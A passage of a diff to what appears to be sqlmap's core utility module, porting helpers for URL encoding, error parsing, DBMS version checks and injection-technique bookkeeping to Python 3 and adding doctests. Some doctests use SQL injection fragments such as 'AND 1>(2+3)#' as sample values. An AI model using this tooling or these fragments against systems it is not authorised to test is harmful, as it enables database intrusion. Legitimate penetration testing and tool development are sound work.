(1.0 * conf.timeSec / candidate) > MIN_VALID_DELAYED_RESPONSE: # Note: to prevent problems with fast responses for heavy-queries like RANDOMBLOB conf.timeSec = candidate infoMsg = "adjusting time delay to " @@ -1955,90 +2866,160 @@ def getLastRequestHTTPError(): def extractErrorMessage(page): """ Returns reported error message from page if it founds one + + >>> getText(extractErrorMessage(u'Test\\nWarning: oci_parse() [function.oci-parse]: ORA-01756: quoted string not properly terminated

Only a test page

') ) + 'oci_parse() [function.oci-parse]: ORA-01756: quoted string not properly terminated' + >>> extractErrorMessage('Warning: This is only a dummy foobar test') is None + True """ retVal = None - if isinstance(page, basestring): + if isinstance(page, six.string_types): + if wasLastResponseDBMSError(): + page = re.sub(r"<[^>]+>", "", page) + for regex in ERROR_PARSING_REGEXES: - match = re.search(regex, page, re.DOTALL | re.IGNORECASE) + match = re.search(regex, page, re.IGNORECASE) if match: - retVal = htmlunescape(match.group("result")).replace("
", "\n").strip() - break + candidate = htmlUnescape(match.group("result")).replace("
", "\n").strip() + if candidate and (1.0 * len(re.findall(r"[^A-Za-z,. ]", candidate)) / len(candidate) > MIN_ERROR_PARSING_NON_WRITING_RATIO): + retVal = candidate + break + + if not retVal and wasLastResponseDBMSError(): + match = re.search(r"[^\n]*SQL[^\n:]*:[^\n]*", page, re.IGNORECASE) + + if match: + retVal = match.group(0) + + return retVal + +def findLocalPort(ports): + """ + Find the first opened localhost port from a given list of ports (e.g. for Tor port checks) + """ + + retVal = None + + for port in ports: + try: + try: + s = socket._orig_socket(socket.AF_INET, socket.SOCK_STREAM) + except AttributeError: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((LOCALHOST, port)) + retVal = port + break + except socket.error: + pass + finally: + try: + s.close() + except socket.error: + pass return retVal def findMultipartPostBoundary(post): """ Finds value for a boundary parameter in given multipart POST body + + >>> findMultipartPostBoundary("-----------------------------9051914041544843365972754266\\nContent-Disposition: form-data; name=text\\n\\ndefault") + '9051914041544843365972754266' """ retVal = None - - done = set() - candidates = [] + counts = {} for match in re.finditer(r"(?m)^--(.+?)(--)?$", post or ""): - _ = match.group(1) - if _ in done: - continue - else: - candidates.append((post.count(_), _)) - done.add(_) + boundary = match.group(1).strip().strip('-') + counts[boundary] = counts.get(boundary, 0) + 1 - if candidates: - candidates.sort(key=lambda _: _[0], reverse=True) - retVal = candidates[0][1] + if counts: + sorted_boundaries = sorted(counts.items(), key=lambda x: x[1], reverse=True) + retVal = sorted_boundaries[0][0] return retVal -def urldecode(value, encoding=None, unsafe="%%&=;+%s" % CUSTOM_INJECTION_MARK_CHAR, convall=False, plusspace=True): +def urldecode(value, encoding=None, unsafe="%%?&=;+%s" % CUSTOM_INJECTION_MARK_CHAR, convall=False, spaceplus=True): + """ + URL decodes given value + + >>> urldecode('AND%201%3E%282%2B3%29%23', convall=True) == 'AND 1>(2+3)#' + True + >>> urldecode('AND%201%3E%282%2B3%29%23', convall=False) == 'AND 1>(2%2B3)#' + True + >>> urldecode(b'AND%201%3E%282%2B3%29%23', convall=False) == 'AND 1>(2%2B3)#' + True + """ + result = value if value: - try: - # for cases like T%C3%BCrk%C3%A7e - value = str(value) - except ValueError: - pass - finally: - if convall: - result = urllib.unquote_plus(value) - else: - def _(match): - charset = reduce(lambda x, y: x.replace(y, ""), unsafe, string.printable) - char = chr(ord(match.group(1).decode("hex"))) - return char if char in charset else match.group(0) - result = re.sub("%([0-9a-fA-F]{2})", _, value) + value = getUnicode(value) + + if convall: + result = _urllib.parse.unquote_plus(value) if spaceplus else _urllib.parse.unquote(value) + else: + result = value + charset = set(string.printable) - set(unsafe) + + def _(match): + char = decodeHex(match.group(1), binary=False) + return char if char in charset else match.group(0) + + if spaceplus: + result = result.replace('+', ' ') # plus sign has a special meaning in URL encoded data (hence the usage of _urllib.parse.unquote_plus in convall case) - if plusspace: - result = result.replace("+", " ") # plus sign has a special meaning in url encoded data (hence the usage of urllib.unquote_plus in convall case) + result = re.sub(r"%([0-9a-fA-F]{2})", _, result or "") - if isinstance(result, str): - result = unicode(result, encoding or UNICODE_ENCODING, "replace") + result = getUnicode(result, encoding or UNICODE_ENCODING) return result -def urlencode(value, safe="%&=", convall=False, limit=False, spaceplus=False): - if conf.direct: +def urlencode(value, safe="%&=-_", convall=False, limit=False, spaceplus=False): + """ + URL encodes given value + + >>> urlencode('AND 1>(2+3)#') + 'AND%201%3E%282%2B3%29%23' + >>> urlencode("AND COUNT(SELECT name FROM users WHERE name LIKE '%DBA%')>0") + 'AND%20COUNT%28SELECT%20name%20FROM%20users%20WHERE%20name%20LIKE%20%27%25DBA%25%27%29%3E0' + >>> urlencode("AND COUNT(SELECT name FROM users WHERE name LIKE '%_SYSTEM%')>0") + 'AND%20COUNT%28SELECT%20name%20FROM%20users%20WHERE%20name%20LIKE%20%27%25_SYSTEM%25%27%29%3E0' + >>> urlencode("SELECT NAME FROM TABLE WHERE VALUE LIKE '%SOME%BEGIN%'") + 'SELECT%20NAME%20FROM%20TABLE%20WHERE%20VALUE%20LIKE%20%27%25SOME%25BEGIN%25%27' + """ + + if conf.get("direct"): return value count = 0 result = None if value is None else "" if value: + value = re.sub(r"\b[$\w]+=", lambda match: match.group(0).replace('$', DOLLAR_MARKER), value) + + if Backend.isDbms(DBMS.MSSQL) and not kb.tamperFunctions and any(ord(_) > 255 for _ in value): + warnMsg = "if you experience problems with " + warnMsg += "non-ASCII identifier names " + warnMsg += "you are advised to rerun with '--tamper=charunicodeencode'" + singleTimeWarnMessage(warnMsg) + if convall or safe is None: safe = "" # corner case when character % really needs to be - # encoded (when not representing url encoded char) + # encoded (when not representing URL encoded char) # except in cases when tampering scripts are used - if all(map(lambda x: '%' in x, [safe, value])) and not kb.tamperFunctions: - value = re.sub("%(?![0-9a-fA-F]{2})", "%25", value) + if all('%' in _ for _ in (safe, value)) and not kb.tamperFunctions: + value = re.sub(r"(?i)\bLIKE\s+'[^']+'", lambda match: match.group(0).replace('%', "%25"), value) + value = re.sub(r"%(?![0-9a-fA-F]{2})", "%25", value) while True: - result = urllib.quote(utf8encode(value), safe) + result = _urllib.parse.quote(getBytes(value), safe) if limit and len(result) > URLENCODE_CHAR_LIMIT: if count >= len(URLENCODE_FAILSAFE_CHARS): @@ -2053,7 +3034,9 @@ def urlencode(value, safe="%&=", convall=False, limit=False, spaceplus=False): break if spaceplus: - result = result.replace(urllib.quote(' '), '+') + result = result.replace(_urllib.parse.quote(' '), '+') + + result = result.replace(DOLLAR_MARKER, '$') return result @@ -2067,11 +3050,13 @@ def runningAsAdmin(): if PLATFORM in ("posix", "mac"): _ = os.geteuid() - isAdmin = isinstance(_, (int, float, long)) and _ == 0 + isAdmin = isinstance(_, (float, six.integer_types)) and _ == 0 elif IS_WIN: + import ctypes + _ = ctypes.windll.shell32.IsUserAnAdmin() - isAdmin = isinstance(_, (int, float, long)) and _ == 1 + isAdmin = isinstance(_, (float, six.integer_types)) and _ == 1 else: errMsg = "sqlmap is not able to check if you are running it " errMsg += "as an administrator account on this platform. " @@ -2084,37 +3069,51 @@ def runningAsAdmin(): return isAdmin -def logHTTPTraffic(requestLogMsg, responseLogMsg): +def logHTTPTraffic(requestLogMsg, responseLogMsg, startTime=None, endTime=None): """ Logs HTTP traffic to the output file """ - if not conf.trafficFile: - return + if conf.harFile: + conf.httpCollector.collectRequest(requestLogMsg, responseLogMsg, startTime, endTime) - with kb.locks.log: - dataToTrafficFile("%s%s" % (requestLogMsg, os.linesep)) - dataToTrafficFile("%s%s" % (responseLogMsg, os.linesep)) - dataToTrafficFile("%s%s%s%s" % (os.linesep, 76 * '#', os.linesep, os.linesep)) + if conf.trafficFile: + with kb.locks.log: + dataToTrafficFile("%s%s" % (requestLogMsg, os.linesep)) + dataToTrafficFile("%s%s" % (responseLogMsg, os.linesep)) + dataToTrafficFile("%s%s%s%s" % (os.linesep, 76 * '#', os.linesep, os.linesep)) -def getPageTemplate(payload, place): # Cross-linked function - pass +def getPageTemplate(payload, place): # Cross-referenced function + raise NotImplementedError +@cachedmethod def getPublicTypeMembers(type_, onlyValues=False): """ Useful for getting members from types (e.g. in enums) + + >>> [_ for _ in getPublicTypeMembers(OS, True)] + ['Linux', 'Windows'] + >>> [_ for _ in getPublicTypeMembers(PAYLOAD.TECHNIQUE, True)] + [1, 2, 3, 4, 5, 6] """ + retVal = [] + for name, value in inspect.getmembers(type_): - if not name.startswith('__'): + if not name.startswith("__"): if not onlyValues: - yield (name, value) + retVal.append((name, value)) else: - yield value + retVal.append(value) + + return retVal def enumValueToNameLookup(type_, value_): """ Returns name of a enum member with a given value + + >>> enumValueToNameLookup(SORT_ORDER, 100) + 'LAST' """ retVal = None @@ -2126,15 +3125,24 @@ def enumValueToNameLookup(type_, value_): return retVal +@cachedmethod def extractRegexResult(regex, content, flags=0): """ Returns 'result' group value from a possible match with regex on a given content + + >>> extractRegexResult(r'a(?P[^g]+)g', 'abcdefg') + 'bcdef' + >>> extractRegexResult(r'a(?P[^g]+)g', 'ABCDEFG', re.I) + 'BCDEF' """ retVal = None - if regex and content and '?P' in regex: + if regex and content and "?P" in regex: + if isinstance(content, six.binary_type) and isinstance(regex, six.text_type): + regex = getBytes(regex) + match = re.search(regex, content, flags) if match: @@ -2145,14 +3153,27 @@ def extractRegexResult(regex, content, flags=0): def extractTextTagContent(page): """ Returns list containing content from "textual" tags + + >>> extractTextTagContent('Title
foobar
Link') + ['Title', 'foobar'] """ - page = re.sub(r"(?si)[^\s>]*%s[^<]*" % REFLECTED_VALUE_MARKER, "", page or "") - return filter(None, (_.group('result').strip() for _ in re.finditer(TEXT_TAG_REGEX, page))) + page = page or "" + + if REFLECTED_VALUE_MARKER in page: + try: + page = re.sub(r"(?i)[^\s>]*%s[^\s<]*" % REFLECTED_VALUE_MARKER, "", page) + except MemoryError: + page = page.replace(REFLECTED_VALUE_MARKER, "") + + return filterNone(_.group("result").strip() for _ in re.finditer(TEXT_TAG_REGEX, page)) def trimAlphaNum(value): """ Trims alpha numeric characters from start and ending of a given value + + >>> trimAlphaNum('AND 1>(2+3)-- foobar') + ' 1>(2+3)-- ' """ while value and value[-1].isalnum(): @@ -2166,14 +3187,35 @@ def trimAlphaNum(value): def isNumPosStrValue(value): """ Returns True if value is a string (or integer) with a positive integer representation + + >>> isNumPosStrValue(1) + True + >>> isNumPosStrValue('1') + True + >>> isNumPosStrValue(0) + False + >>> isNumPosStrValue('-2') + False + >>> isNumPosStrValue('100000000000000000000') + False """ - return (value and isinstance(value, basestring) and value.isdigit() and value != "0") or (isinstance(value, int) and value != 0) + retVal = False + + try: + retVal = ((hasattr(value, "isdigit") and value.isdigit() and int(value) > 0) or (isinstance(value, int) and value > 0)) and int(value) < MAX_INT + except ValueError: + pass + + return retVal @cachedmethod def aliasToDbmsEnum(dbms): """ Returns major DBMS name from a given alias + + >>> aliasToDbmsEnum('mssql') + 'Microsoft SQL Server' """ retVal = None @@ -2190,19 +3232,26 @@ def findDynamicContent(firstPage, secondPage): """ This function checks if the provided pages have dynamic content. If they are dynamic, proper markings will be made + + >>> findDynamicContent("Lorem ipsum dolor sit amet, congue tation referrentur ei sed. Ne nec legimus habemus recusabo, natum reque et per. Facer tritani reprehendunt eos id, modus constituam est te. Usu sumo indoctum ad, pri paulo molestiae complectitur no.", "Lorem ipsum dolor sit amet, congue tation referrentur ei sed. Ne nec legimus habemus recusabo, natum reque et per. Facer tritani reprehendunt eos id, modus constituam est te. Usu sumo indoctum ad, pri paulo molestiae complectitur no.") + >>> kb.dynamicMarkings + [('natum reque et per. ', 'Facer tritani repreh')] """ + if not firstPage or not secondPage: + return + infoMsg = "searching for dynamic content" - logger.info(infoMsg) + singleTimeLogMessage(infoMsg) - blocks = SequenceMatcher(None, firstPage, secondPage).get_matching_blocks() + blocks = list(SequenceMatcher(None, firstPage, secondPage).get_matching_blocks()) kb.dynamicMarkings = [] # Removing too small matching blocks for block in blocks[:]: (_, _, length) = block - if length <= DYNAMICITY_MARK_LENGTH: + if length <= 2 * DYNAMICITY_BOUNDARY_LENGTH: blocks.remove(block) # Making of dynamic markings based on prefix/suffix principle @@ -2220,14 +3269,25 @@ def findDynamicContent(firstPage, secondPage): if suffix is None and (blocks[i][0] + blocks[i][2] >= len(firstPage)): continue - prefix = trimAlphaNum(prefix) - suffix = trimAlphaNum(suffix) + if prefix and suffix: + prefix = prefix[-DYNAMICITY_BOUNDARY_LENGTH:] + suffix = suffix[:DYNAMICITY_BOUNDARY_LENGTH] + + for _ in (firstPage, secondPage): + match = re.search(r"(?s)%s(.+)%s" % (re.escape(prefix), re.escape(suffix)), _) + if match: + infix = match.group(1) + if infix[0].isalnum(): + prefix = trimAlphaNum(prefix) + if infix[-1].isalnum(): + suffix = trimAlphaNum(suffix) + break - kb.dynamicMarkings.append((re.escape(prefix[-DYNAMICITY_MARK_LENGTH / 2:]) if prefix else None, re.escape(suffix[:DYNAMICITY_MARK_LENGTH / 2]) if suffix else None)) + kb.dynamicMarkings.append((prefix if prefix else None, suffix if suffix else None)) if len(kb.dynamicMarkings) > 0: infoMsg = "dynamic content marked for removal (%d region%s)" % (len(kb.dynamicMarkings), 's' if len(kb.dynamicMarkings) > 1 else '') - logger.info(infoMsg) + singleTimeLogMessage(infoMsg) def removeDynamicContent(page): """ @@ -2242,105 +3302,252 @@ def removeDynamicContent(page): if prefix is None and suffix is None: continue elif prefix is None: - page = re.sub(r'(?s)^.+%s' % suffix, suffix, page) + page = re.sub(r"(?s)^.+%s" % re.escape(suffix), suffix.replace('\\', r'\\'), page) elif suffix is None: - page = re.sub(r'(?s)%s.+$' % prefix, prefix, page) + page = re.sub(r"(?s)%s.+$" % re.escape(prefix), prefix.replace('\\', r'\\'), page) else: - page = re.sub(r'(?s)%s.+%s' % (prefix, suffix), '%s%s' % (prefix, suffix), page) + page = re.sub(r"(?s)%s.+%s" % (re.escape(prefix), re.escape(suffix)), "%s%s" % (prefix.replace('\\', r'\\'), suffix.replace('\\', r'\\')), page) return page -def filterStringValue(value, regex, replacement=""): +def filterStringValue(value, charRegex, replacement=""): """ Returns string value consisting only of chars satisfying supplied regular expression (note: it has to be in form [...]) + + >>> filterStringValue('wzydeadbeef0123#', r'[0-9a-f]') + 'deadbeef0123' """ retVal = value if value: - retVal = re.sub(regex.replace("[", "[^") if "[^" not in regex else regex.replace("[^", "["), replacement, value) + retVal = re.sub(charRegex.replace("[", "[^") if "[^" not in charRegex else charRegex.replace("[^", "["), replacement, value) return retVal -def filterControlChars(value): +def filterControlChars(value, replacement=' '): + """ + Returns string value with control chars being supstituted with replacement character + + >>> filterControlChars('AND 1>(2+3)\\n--') + 'AND 1>(2+3) --' + """ + + return filterStringValue(value, PRINTABLE_CHAR_REGEX, replacement) + +def filterNone(values): """ - Returns string value with control chars being supstituted with ' ' + Emulates filterNone([...]) functionality + + >>> filterNone([1, 2, "", None, 3, 0]) + [1, 2, 3, 0] """ - return filterStringValue(value, PRINTABLE_CHAR_REGEX, ' ') + retVal = values + + if isinstance(values, _collections.Iterable): + retVal = [_ for _ in values if _ or _ == 0] + + return retVal -def isDBMSVersionAtLeast(version): +def isDBMSVersionAtLeast(minimum): """ - Checks if the recognized DBMS version is at least the version - specified + Checks if the recognized DBMS version is at least the version specified + + >>> pushValue(kb.dbmsVersion) + >>> kb.dbmsVersion = "2" + >>> isDBMSVersionAtLeast("1.3.4.1.4") + True + >>> isDBMSVersionAtLeast(2.1) + False + >>> isDBMSVersionAtLeast(">2") + False + >>> isDBMSVersionAtLeast(">=2.0") + True + >>> kb.dbmsVersion = "<2" + >>> isDBMSVersionAtLeast("2") + False + >>> isDBMSVersionAtLeast("1.5") + True + >>> kb.dbmsVersion = "MySQL 5.4.3-log4" + >>> isDBMSVersionAtLeast("5") + True + >>> kb.dbmsVersion = popValue() """ retVal = None - if Backend.getVersion() and Backend.getVersion() != UNKNOWN_DBMS_VERSION: - value = Backend.getVersion().replace(" ", "").rstrip('.') + if not any(isNoneValue(_) for _ in (Backend.getVersion(), minimum)) and Backend.getVersion() != UNKNOWN_DBMS_VERSION: + version = Backend.getVersion().replace(" ", "").rstrip('.') - while True: - index = value.find('.', value.find('.') + 1) + correction = 0.0 + if ">=" in version: + pass + elif '>' in version: + correction = VERSION_COMPARISON_CORRECTION + elif '<' in version: + correction = -VERSION_COMPARISON_CORRECTION - if index > -1: - value = value[0:index] + value[index + 1:] - else: - break + version = extractRegexResult(r"(?P[0-9][0-9.]*)", version) + + if version: + if '.' in version: + parts = version.split('.', 1) + parts[1] = filterStringValue(parts[1], '[0-9]') + version = '.'.join(parts) - value = filterStringValue(value, '[0-9.><=]') + try: + version = float(filterStringValue(version, '[0-9.]')) + correction + except ValueError: + return None + + if isinstance(minimum, six.string_types): + if '.' in minimum: + parts = minimum.split('.', 1) + parts[1] = filterStringValue(parts[1], '[0-9]') + minimum = '.'.join(parts) + + correction = 0.0 + if minimum.startswith(">="): + pass + elif minimum.startswith(">"): + correction = VERSION_COMPARISON_CORRECTION - if isinstance(value, basestring): - if value.startswith(">="): - value = float(value.replace(">=", "")) - elif value.startswith(">"): - value = float(value.replace(">", "")) + 0.01 - elif value.startswith("<="): - value = float(value.replace("<=", "")) - elif value.startswith(">"): - value = float(value.replace("<", "")) - 0.01 + minimum = float(filterStringValue(minimum, '[0-9.]')) + correction - retVal = getUnicode(value) >= getUnicode(version) + retVal = version >= minimum return retVal def parseSqliteTableSchema(value): """ Parses table column names and types from specified SQLite table schema + + >>> kb.data.cachedColumns = {} + >>> parseSqliteTableSchema("CREATE TABLE users(\\n\\t\\tid INTEGER,\\n\\t\\tname TEXT\\n);") + True + >>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('id', 'INTEGER'), ('name', 'TEXT')) + True + >>> parseSqliteTableSchema("CREATE TABLE dummy(`foo bar` BIGINT, \\"foo\\" VARCHAR, 'bar' TEXT)"); + True + >>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('foo bar', 'BIGINT'), ('foo', 'VARCHAR'), ('bar', 'TEXT')) + True + >>> parseSqliteTableSchema("CREATE TABLE suppliers(\\n\\tsupplier_id INTEGER PRIMARY KEY DESC,\\n\\tname TEXT NOT NULL\\n);"); + True + >>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('supplier_id', 'INTEGER'), ('name', 'TEXT')) + True + >>> parseSqliteTableSchema("CREATE TABLE country_languages (\\n\\tcountry_id INTEGER NOT NULL,\\n\\tlanguage_id INTEGER NOT NULL,\\n\\tPRIMARY KEY (country_id, language_id),\\n\\tFOREIGN KEY (country_id) REFERENCES countries (country_id) ON DELETE CASCADE ON UPDATE NO ACTION,\\tFOREIGN KEY (language_id) REFERENCES languages (language_id) ON DELETE CASCADE ON UPDATE NO ACTION);"); + True + >>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('country_id', 'INTEGER'), ('language_id', 'INTEGER')) + True """ + retVal = False + + value = extractRegexResult(r"(?s)\((?P.+)\)", value) + if value: table = {} - columns = {} + columns = OrderedDict() + + value = re.sub(r"\(.+?\)", "", value).strip() - for match in re.finditer(r"(\w+)\s+(TEXT|NUMERIC|INTEGER|REAL|NONE)", value): - columns[match.group(1)] = match.group(2) + for match in re.finditer(r"(?:\A|,)\s*(([\"'`]).+?\2|\w+)(?:\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|LONGTEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b)?", decodeStringEscape(value), re.I): + column = match.group(1).strip(match.group(2) or "") + if re.search(r"(?i)\A(CONSTRAINT|PRIMARY|UNIQUE|CHECK|FOREIGN)\b", column.strip()): + continue + retVal = True + + columns[column] = match.group(3) or "TEXT" + + table[safeSQLIdentificatorNaming(conf.tbl, True)] = columns + if conf.db in kb.data.cachedColumns: + kb.data.cachedColumns[conf.db].update(table) + else: + kb.data.cachedColumns[conf.db] = table - table[conf.tbl] = columns - kb.data.cachedColumns[conf.db] = table + return retVal def getTechniqueData(technique=None): """ Returns injection data for technique specified """ - return kb.injection.data.get(technique) + return kb.injection.data.get(technique if technique is not None else getTechnique()) def isTechniqueAvailable(technique): """ - Returns True if there is injection data which sqlmap could use for - technique specified + Returns True if there is injection data which sqlmap could use for technique specified + + >>> pushValue(kb.injection.data) + >>> kb.injection.data[PAYLOAD.TECHNIQUE.ERROR] = [test for test in getSortedInjectionTests() if "error" in test["title"].lower()][0] + >>> isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) + True + >>> kb.injection.data = popValue() """ - if conf.tech and isinstance(conf.tech, list) and technique not in conf.tech: + if conf.technique and isinstance(conf.technique, list) and technique not in conf.technique: return False else: return getTechniqueData(technique) is not None +def isHeavyQueryBased(technique=None): + """ + Returns True whether current (kb.)technique is heavy-query based + + >>> pushValue(kb.injection.data) + >>> setTechnique(PAYLOAD.TECHNIQUE.STACKED) + >>> kb.injection.data[getTechnique()] = [test for test in getSortedInjectionTests() if "heavy" in test["title"].lower()][0] + >>> isHeavyQueryBased() + True + >>> kb.injection.data = popValue() + """ + + retVal = False + + technique = technique or getTechnique() + + if isTechniqueAvailable(technique): + data = getTechniqueData(technique) + if data and "heavy query" in data["title"].lower(): + retVal = True + + return retVal + +def isStackingAvailable(): + """ + Returns True whether techniques using stacking are available + + >>> pushValue(kb.injection.data) + >>> kb.injection.data[PAYLOAD.TECHNIQUE.STACKED] = [test for test in getSortedInjectionTests() if "stacked" in test["title"].lower()][0] + >>> isStackingAvailable() + True + >>> kb.injection.data = popValue() + """ + + retVal = False + + if PAYLOAD.TECHNIQUE.STACKED in kb.injection.data: + retVal = True + else: + for technique in getPublicTypeMembers(PAYLOAD.TECHNIQUE, True): + data = getTechniqueData(technique) + if data and "stacked" in data["title"].lower(): + retVal = True + break + + return retVal + def isInferenceAvailable(): """ Returns True whether techniques using inference technique are available + + >>> pushValue(kb.injection.data) + >>> kb.injection.data[PAYLOAD.TECHNIQUE.BOOLEAN] = getSortedInjectionTests()[0] + >>> isInferenceAvailable() + True + >>> kb.injection.data = popValue() """ return any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.STACKED, PAYLOAD.TECHNIQUE.TIME)) @@ -2350,15 +3557,67 @@ def setOptimize(): Sets options turned on by switch '-o' """ - #conf.predictOutput = True + # conf.predictOutput = True conf.keepAlive = True - conf.threads = 3 if conf.threads < 3 else conf.threads - conf.nullConnection = not any([conf.data, conf.textOnly, conf.titles, conf.string, conf.notString, conf.regexp, conf.tor]) + conf.threads = 3 if conf.threads < 3 and cmdLineOptions.threads is None else conf.threads + conf.nullConnection = not any((conf.data, conf.textOnly, conf.titles, conf.string, conf.notString, conf.regexp, conf.tor)) if not conf.nullConnection: - debugMsg = "turning off --null-connection switch used indirectly by switch -o" + debugMsg = "turning off switch '--null-connection' used indirectly by switch '-o'" logger.debug(debugMsg) +def saveConfig(conf, filename): + """ + Saves conf to configuration filename + """ + + config = UnicodeRawConfigParser() + userOpts = {} + + for family in optDict: + userOpts[family] = [] + + for option, value in conf.items(): + for family, optionData in optDict.items(): + if option in optionData: + userOpts[family].append((option, value, optionData[option])) + + for family, optionData in userOpts.items(): + config.add_section(family) + + optionData.sort() + + for option, value, datatype in optionData: + if datatype and isListLike(datatype): + datatype = datatype[0] + + if option in IGNORE_SAVE_OPTIONS: + continue + + if value is None: + if datatype == OPTION_TYPE.BOOLEAN: + value = "False" + elif datatype in (OPTION_TYPE.INTEGER, OPTION_TYPE.FLOAT): + if option in defaults: + value = str(defaults[option]) + else: + value = '0' + elif datatype == OPTION_TYPE.STRING: + value = "" + + if isinstance(value, six.string_types): + value = value.replace("\n", "\n ") + + config.set(family, option, value) + + with openFile(filename, 'w') as f: + try: + config.write(f) + except IOError as ex: + errMsg = "something went wrong while trying " + errMsg += "to write to the configuration file '%s' ('%s')" % (filename, getSafeExString(ex)) + raise SqlmapSystemException(errMsg) + def initTechnique(technique=None): """ Prepares data for technique specified @@ -2377,7 +3636,7 @@ def initTechnique(technique=None): for key, value in kb.injection.conf.items(): if value and (not hasattr(conf, key) or (hasattr(conf, key) and not getattr(conf, key))): setattr(conf, key, value) - debugMsg = "resuming configuration option '%s' (%s)" % (key, value) + debugMsg = "resuming configuration option '%s' (%s)" % (key, ("'%s'" % value) if isinstance(value, six.string_types) else value) logger.debug(debugMsg) if value and key == "optimize": @@ -2385,7 +3644,7 @@ def initTechnique(technique=None): else: warnMsg = "there is no injection data available for technique " warnMsg += "'%s'" % enumValueToNameLookup(PAYLOAD.TECHNIQUE, technique) - logger.warn(warnMsg) + logger.warning(warnMsg) except SqlmapDataException: errMsg = "missing data in old session file(s). " @@ -2396,9 +3655,14 @@ def initTechnique(technique=None): def arrayizeValue(value): """ Makes a list out of value if it is not already a list or tuple itself + + >>> arrayizeValue('1') + ['1'] """ - if not isListLike(value): + if isinstance(value, _collections.KeysView): + value = [_ for _ in value] + elif not isListLike(value): value = [value] return value @@ -2406,16 +3670,38 @@ def arrayizeValue(value): def unArrayizeValue(value): """ Makes a value out of iterable if it is a list or tuple itself + + >>> unArrayizeValue(['1']) + '1' + >>> unArrayizeValue('1') + '1' + >>> unArrayizeValue(['1', '2']) + '1' + >>> unArrayizeValue([['a', 'b'], 'c']) + 'a' + >>> unArrayizeValue(_ for _ in xrange(10)) + 0 """ if isListLike(value): - value = value[0] if len(value) > 0 else None + if not value: + value = None + elif len(value) == 1 and not isListLike(value[0]): + value = value[0] + else: + value = [_ for _ in flattenValue(value) if _ is not None] + value = value[0] if len(value) > 0 else None + elif inspect.isgenerator(value): + value = unArrayizeValue([_ for _ in value]) return value def flattenValue(value): """ Returns an iterator representing flat representation of a given value + + >>> [_ for _ in flattenValue([['1'], [['2'], '3']])] + ['1', '2', '3'] """ for i in iter(value): @@ -2425,17 +3711,46 @@ def flattenValue(value): else: yield i +def joinValue(value, delimiter=','): + """ + Returns a value consisting of joined parts of a given value + + >>> joinValue(['1', '2']) + '1,2' + >>> joinValue('1') + '1' + >>> joinValue(['1', None]) + '1,None' + """ + + if isListLike(value): + retVal = delimiter.join(getText(_ if _ is not None else "None") for _ in value) + else: + retVal = value + + return retVal + def isListLike(value): """ Returns True if the given value is a list-like instance + + >>> isListLike([1, 2, 3]) + True + >>> isListLike('2') + False """ - return isinstance(value, (list, tuple, set, BigArray)) + return isinstance(value, (list, tuple, set, OrderedSet, BigArray)) def getSortedInjectionTests(): """ - Returns prioritized test list by eventually detected DBMS from error - messages + Returns prioritized test list by eventually detected DBMS from error messages + + >>> pushValue(kb.forcedDbms) + >>> kb.forcedDbms = DBMS.SQLITE + >>> [test for test in getSortedInjectionTests() if hasattr(test, "details") and hasattr(test.details, "dbms")][0].details.dbms == kb.forcedDbms + True + >>> kb.forcedDbms = popValue() """ retVal = copy.deepcopy(conf.tests) @@ -2446,27 +3761,29 @@ def priorityFunction(test): if test.stype == PAYLOAD.TECHNIQUE.UNION: retVal = SORT_ORDER.LAST - elif 'details' in test and 'dbms' in test.details: - if test.details.dbms in Backend.getErrorParsedDBMSes(): + elif "details" in test and "dbms" in (test.details or {}): + if intersect(test.details.dbms, Backend.getIdentifiedDbms()): retVal = SORT_ORDER.SECOND else: retVal = SORT_ORDER.THIRD return retVal - if Backend.getErrorParsedDBMSes(): + if Backend.getIdentifiedDbms(): retVal = sorted(retVal, key=priorityFunction) return retVal def filterListValue(value, regex): """ - Returns list with items that have parts satisfying given regular - expression + Returns list with items that have parts satisfying given regular expression + + >>> filterListValue(['users', 'admins', 'logs'], r'(users|admins)') + ['users', 'admins'] """ if isinstance(value, list) and regex: - retVal = filter(lambda _: re.search(regex, _, re.I), value) + retVal = [_ for _ in value if re.search(regex, _, re.I)] else: retVal = value @@ -2479,79 +3796,278 @@ def showHttpErrorCodes(): if kb.httpErrorCodes: warnMsg = "HTTP error codes detected during run:\n" - warnMsg += ", ".join("%d (%s) - %d times" % (code, httplib.responses[code] \ - if code in httplib.responses else '?', count) \ - for code, count in kb.httpErrorCodes.items()) - logger.warn(warnMsg) + warnMsg += ", ".join("%d (%s) - %d times" % (code, _http_client.responses[code] if code in _http_client.responses else '?', count) for code, count in kb.httpErrorCodes.items()) + logger.warning(warnMsg) + if any((str(_).startswith('4') or str(_).startswith('5')) and _ != _http_client.INTERNAL_SERVER_ERROR and _ != kb.originalCode for _ in kb.httpErrorCodes): + msg = "too many 4xx and/or 5xx HTTP error codes " + msg += "could mean that some kind of protection is involved (e.g. WAF)" + logger.debug(msg) -def openFile(filename, mode='r'): +def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="reversible", buffering=1): # "buffering=1" means line buffered (Reference: http://stackoverflow.com/a/3168436) """ Returns file handle of a given filename + + >>> "openFile" in openFile(__file__).read() + True + >>> b"openFile" in openFile(__file__, "rb", None).read() + True """ - try: - return codecs.open(filename, mode, UNICODE_ENCODING, "replace") - except IOError: - errMsg = "there has been a file opening error for filename '%s'. " % filename - errMsg += "Please check %s permissions on a file " % ("write" if \ - mode and ('w' in mode or 'a' in mode or '+' in mode) else "read") - errMsg += "and that it's not locked by another process." - raise SqlmapFilePathException(errMsg) + # Reference: https://stackoverflow.com/a/37462452 + if 'b' in mode: + buffering = 0 + encoding = None + + if filename == STDIN_PIPE_DASH: + if filename not in kb.cache.content: + kb.cache.content[filename] = sys.stdin.read() + + return contextlib.closing(io.StringIO(readCachedFileContent(filename))) + else: + try: + return codecs_open(filename, 